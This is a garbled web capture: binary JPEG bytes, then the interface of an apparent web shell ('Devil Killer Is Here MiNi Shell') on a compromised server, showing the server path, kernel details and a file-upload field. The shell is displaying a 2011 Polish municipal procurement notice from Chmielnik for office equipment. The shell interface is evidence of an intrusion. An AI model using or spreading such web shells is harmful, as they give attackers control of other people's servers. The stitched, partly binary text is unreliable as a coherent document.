JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111207/415354-N-2011.html

<p class="kh_header"><b>Chmielnik: Dostawa urządzenia wielofunkcyjnego, komputerów stacjonarnych, niszczarek oraz materiałów eksploatacyjnych na potrzeby Urzędu Miasta i Gminy 
w Chmielniku.</b><br>
<b>Numer ogłoszenia: 415354 - 2011; data zamieszczenia: 07.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chmielnik , Plac Kościuszki 7, 26-020 Chmielnik, woj. świętokrzyskie, tel. 41 3543273, faks 41 3543273.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa urządzenia wielofunkcyjnego, komputerów stacjonarnych, niszczarek oraz materiałów eksploatacyjnych na potrzeby Urzędu Miasta i Gminy 
w Chmielniku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa niżej wymienionych urządzeń tj. urządzenia wielofunkcyjnego kopiującego, komputerów stacjonarnych, niszczarek oraz materiałów eksploatacyjnych. Zamawiający dopuszcza złożenie oferty częściowej. Postępowanie prowadzone jest z podziałem na trzy części tj.
Część I: 
Dostawa nowego wielofunkcyjnego urządzenia kopiującego na potrzeby Urzędu Miasta i Gminy Chmielnik.
Część II : 
Dostawa niszczarek i materiałów eksploatacyjnych do urządzeń drukujących-  tonery- na potrzeby Urzędu Miasta i Gminy Chmielnik w związku z realizacją projektu pn. Wzmocnienie potencjału samorządu Miasta i Gminy Chmielnik realizowanego z Programu Operacyjnego Kapitał Ludzki, Priorytet V. Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej.
Część III: 
Dostawa komputerów stacjonarnych na potrzeby Urzędu Miasta i Gminy w Chmielniku.
3. Szczegółowy opis przedmiotu zamówienia:
Przygotowując ofertę należy brać pod uwagę następującą specyfikację rzeczowo - ilościową:
Część I : Nowe Urządzenie wielofunkcyjne kopiujące 1 szt  spełniające poniższe wymagania: 
1.Nowa kserokopiarka cyfrowa z automatycznym dupleksem z możliwością skanowania w czerni i kolorze, z dotykowym panelem sterującym LCD oraz minimum 2 kasetami na 500 arkuszy każdy,
2.Automatyczny dupleksowy podajnik dokumentów - na min. 100 oryginałów 
przy gramaturze 80 g-m2
3.Kserokopiarka musi posiadać wszystkie elementy niezbędne do uruchomienia i prawidłowej eksploatacji
4.Kserokopiarka powinna zostać dostarczona do siedziby zamawiającego na I piętro.
5.Technologia druku - monochromatyczny druk laserowy.
6.Normatywny cykl pracy miesięcznie -format A4
-Nie mniej niż. 250 000 stron
7.Wkład drukujący
-1 czarny wystarczający na ok. 30 000 stron -przy 5% pokrycia
8.Prędkość kopiowania i drukowania
-min. 35 str.-min. -A4
-min. 16 str.-min. -A3
9.Czas nagrzewania urządzenia
-krótszy niż 20 sekund
10.Obsługiwane formaty papieru
-A3, A4, A5, B4, B5, B6, C5
11.Gramatura papieru
-Od 64 do 209 g-m2
12.Pojemność papieru -dla papieru o gramaturze 80 g-m2
-min. 500 arkuszy - kasety
-min. 100 arkuszy - podajnik boczny
13.Automatyczny dupleks papieru w formacie A3 i A4
14.Obsługiwane nośniki
-papier - kolorowy, papeteria firmowa, zwykły, wstępnie zadrukowany, ekologiczny, szorstki
-etykiety
-folia 
15.Dotykowy panel sterujący z menu w języku polskim
16.Interfejs
-High Speed USB 2.0
-Ethernet 10-100 BaseT
17.Rozdzielczość kopiowania min. 600 x 600 dpi
18.Czas uzyskania pierwszej kopi 
-nie więcej niż 9,5 sekundy
19.Zoom
-25 - 400% - szyba
-25 - 200% - podajnik dokumentów
20.Tryb kopiowania: tekst, tekst-foto, foto
21.Ilość kopi - od 1 do 999
22.Rozdzielczość drukowania min. 600 x 600 dpi
23.Automatyczne drukowanie dwustronne
24.Obsługiwane systemy: 
-Windows XP, Windows Vista, Windows 7, Windows Server 2003-2008
-MAC OS X w wersji 10.2.8, 10.3 lub nowszej
-Linux-Unix
25.Rozdzielczość skanowania do 600 dpi
26.Maksymalny format skanowania - A3
27.Szybkość skanowania
-nie mniejsza niż 40 skanów na minutę -w rozdzielczości 300 dpi
28.Skanowanie przy użyciu podajnika oryginałów.
29.Tryb skanowania
-kolor
-skala szarości
-czarno-biały
30.Formaty pliku 
-JPEG, 
-Wielostronny-jednostronny PDF
31.Funkcja skanowania do USB
32.Minimum roczna gwarancja z obsługą w miejscu instalacji w następnym dniu roboczym
33.Kable
-zasilający - min. 2 m
-USB - min. 3 m
-Patchcord - min. 4 m
34.Kaseta z tonerem
35.Dokumentacja urządzenia
36.Płyta CD-DVD z oprogramowaniem w języku polskim
37.Gwarancja 36 miesięcy.
Część II  : Dostawa niszczarek 2 szt. oraz materiałów eksploatacyjnych- tonerów do określonego rodzaju urządzeń kopiujących: 
-Niszczarka - 2 szt o następujących parametrach:
- niszczy jednorazowo do 9 kartek - 70g na ścinki 3.9x50 mm DIN 3;
- niszczy dokumenty z małymi zszywkami, karty kredytowe,
- szerokość wejścia 225 mm
- funkcja start-stop -fotokomórka, funkcja cofania
- kosz o pojemności 22 litrów
- wymiary urządzenia w mm -W x Sz x G, 400x212x360
- waga urządzenia w kg max 6,2
-Tonery
- do drukarki typu Brother DCP 9045 CN - ilość: 2 komplety tj. 2 x czarny, 2 x niebieski, 2 x purpurowy, 2 x żółty
Pojemność: TN-135
- do drukarki typu Xerox Black-2000 str.-WC 3210 - 3220
Ilość: 3 szt, Kolor: czarny
 Część III:  Dostawa komputerów stacjonarnych - 4 szt. na potrzeby Urzędu Miasta i Gminy w Chmielniku:
1.Typ: 
Komputer stacjonarny. 
2.Zastosowanie: 
Komputer będzie wykorzystywany dla potrzeb aplikacji biurowych, aplikacji edukacyjnych, aplikacji obliczeniowych, dostępu do internetu oraz poczty elektronicznej, jako lokalna baza danych.
3.Procesor:
Procesor wielordzeniowy ze zintegrowaną grafiką, osiągający w teście PassMark CPU Mark wynik min. 3800 punktów.
4.Pamięć operacyjna:
4GB DDR3-2x2048MB, DDR3
5.Dysk twardy:
min. 250 GB SATA, 7200 obr.min.
6.Grafika:
Zintegrowana, z możliwością dynamicznego przydzielenia pamięci w obrębie pamięci systemowej min 256MB do 1 GB, ze wsparciem dla Microsoft DirectX 10.1, OpenGL 3.0,
7.Karta dźwiękowa:
Karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition, 24-bitowa konwersja sygnału cyfrowego na analogowy i analogowego na cyfrowy, 6. kanałowa
8.Obudowa:
Typu MiniTower -2 x 5,25 zewnętrzne, 1 x 3,5 zewnętrzne, 2 x 3,5 wewnętrzne,
Obudowa w jednostce centralnej musi być zabezpieczona przed przypadkowym otwarciem widocznymi wkrętami lub śrubami,
Waga - max 10 kg, 
Zasilacz o mocy max 400W,
W celu szybkiej weryfikacji usterki w obudowę komputera musi być wbudowany wizualno-dźwiękowy system diagnostyczny, służący do sygnalizowania i diagnozowania problemów z komputerem i jego komponentami; a w szczególności musi sygnalizować:
Awarię BIOS-u
Awarię procesora
Uszkodzenia lub braku pamięci RAM, uszkodzenia kontrolera Video, płyty głównej, baterii płyty głównej
9.BIOS:
Funkcja blokowania-odblokowania BOOT-owania stacji roboczej z zewnętrznych urządzeń
Możliwość, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego urządzeń zewnętrznych włączenia i wyłączenia wirtualizacji oraz włączenia i wyłączenia ilości rdzeni w procesorze
Możliwość, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego urządzeń zewnętrznych,  ustawienia hasła na poziomie systemu oraz administratora.
Możliwość włączenia-wyłączenia zintegrowanej karty dźwiękowej, karty sieciowej oraz kontrolera USB z poziomu BIOS, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego, urządzeń zewnętrznych.
Możliwość wyłączenia trybu bootowania dla urządzeń podłączanych do USB, czyli podczas startu komputer nie wykrywa urządzeń bootujących typu USB, natomiast po uruchomieniu systemu operacyjnego porty USB są aktywne.
10.Warunki gwarancji:
min. 3-letnia gwarancja producenta świadczona na miejscu u klienta.
Czas reakcji serwisu - do końca następnego dnia roboczego.
11.Wsparcie techniczne producenta:
Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela.
Dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu poprzez podanie na stronie internetowej producenta numeru seryjnego lub modelu komputera.
12.Wymagania dodatkowe:
Zainstalowany system operacyjny Windows 7 Professional 64bit PL z Service Pack 1 nie wymagający aktywacji za pomocą telefonu lub Internetu w firmie Microsoft , nośnik lub system równoważny - przez równoważność rozumie się pełną funkcjonalność jaką oferuje wymagany w SIWZ system operacyjny,
Zainstalowany Microsoft Office 2010 Home and Business PL lub oprogramowanie równoważne - przez równoważność rozumie się pełną funkcjonalność jaką oferuje oprogramowanie wymagane w SIWZ,
VGA, HDMI, min. 8 x USB, w tym min. 2 z przodu obudowy i 6 z tyłu, port sieciowy RJ-45, Porty audio: z tyłu obudowy 3 szt -wejście i wyjście liniowe oraz wejście na mikrofon, z przodu obudowy 2 szt. wyjście na słuchawki, wejście na mikrofon. Wymagana ilość i rozmieszczenie na zewnątrz obudowy komputera portów USB nie może być osiągnięta w wyniku stosowania konwerterów, przejściówek itp.
Karta sieciowa 10-100-1000 Ethernet RJ 45 - zintegrowana,
Płyta główna wyposażona w 1 złącze PCI Express x16, 3 złącza 
PCI Express x1, 2 złącza DIMM, obsługa do 8GB pamięci RAM, 4 złącza SATA
Klawiatura USB w układzie polski programisty 
Mysz optyczna USB z dwoma klawiszami oraz rolką - scroll
Nagrywarka DVD +/-RW wraz z oprogramowaniem do nagrywania i odtwarzania płyt.
Dołączony nośnik ze sterownikami.
13.Monitor LCD:
Typ ekranu - ciekłokrystaliczny 19 panoramiczny
Kąt widzenia -pionowy-poziomy - min. 160-160 stopni
Czas reakcji - max. 5 ms
Rozdzielczość nominalna - 1440 x 900 piksele
Możliwość podłączenia do obudowy dedykowanych głośników lub głośniki wbudowane.
W celu potwierdzenia, że oferowane urządzenie odpowiada wymaganiom określonym przez zamawiającego, zamawiający żąda przedstawienia następujących dokumentów:
Opis zaproponowanego urządzenia, instrukcji obsługi w języku polskim itp. potwierdzający spełnienie wymagań i parametrów urządzenia, które zostały określone w SIWZ -kserokopia poświadczona za zgodność z oryginałem przez wykonawcę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 20% wartości zamówienia podstawowego dla Części II zamówienia tj. Dostawa niszczarek 2 szt. oraz materiałów eksploatacyjnych- tonerów- do określonego rodzaju urządzeń kopiujących oraz do 20 % wartości zamówienia podstawowego dla Części III zamówienia tj. Dostawa komputerów stacjonarnych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.12.51.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony po przedłożeniu przez wykonawcę oświadczenia o spełnieniu warunków udziału w zamówieniu zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony po przedłożeniu przez wykonawcę oświadczenia o spełnieniu warunków udziału w zamówieniu zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony po przedłożeniu przez wykonawcę oświadczenia o spełnieniu warunków udziału w zamówieniu zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony po przedłożeniu przez wykonawcę oświadczenia o spełnieniu warunków udziału w zamówieniu zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony po przedłożeniu przez wykonawcę oświadczenia o spełnieniu warunków udziału w zamówieniu zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo
Oświadczenie o zaproponowanych materiałach eksploatacyjnych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do art. 144 ustawy Prawo zamówień publicznych Zamawiający zastrzega możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której wybrano Wykonawcę polegającej na  zmianie i przedłużeniu terminu realizacji z powodu wystąpienia zdarzeń losowych oraz w przypadku realizacji zamówień uzupełniających, jak również w przypadku zmiany urzędowej stawki VAT. Stwierdzenie jednej z ww okoliczności  będzie uzasadniało zawarcie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chmielnik.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy
Plac Kościuszki 7
26-020 Chmielnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2011 godzina 10:00, miejsce: Urząd Miasta i Gminy
Plac Kościuszki 7
26-020 Chmielnik
Sekretariat ( Pokój nr 102).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowaniem objęta jest Część II zamówienia tj. Dostawa niszczarek i materiałów eksploatacyjnych do urządzeń drukujących ( tonery) na potrzeby Urzędu Miasta i Gminy Chmielnik w związku z realizacją projektu pn.  Wzmocnienie potencjału samorządu Miasta i Gminy Chmielnik realizowanego z Programu Operacyjnego Kapitał Ludzki; Priorytet V. Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa nowego wielofunkcyjnego urządzenia kopiującego na potrzeby Urzędu Miasta i Gminy Chmielnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa nowego wielofunkcyjnego urządzenia kopiującego na potrzeby Urzędu Miasta i Gminy Chmielnik.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Koszt wydrukowania standardowej strony w kolorze czarnym zadrukowanej w 5 % - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa niszczarek oraz materiałów eksploatacyjnych do określonego rodzaju urządzeń kopiujących.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niszczarek oraz materiałów eksploatacyjnych do określonego rodzaju urządzeń kopiujących.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.12.51.10-5.</p></li>
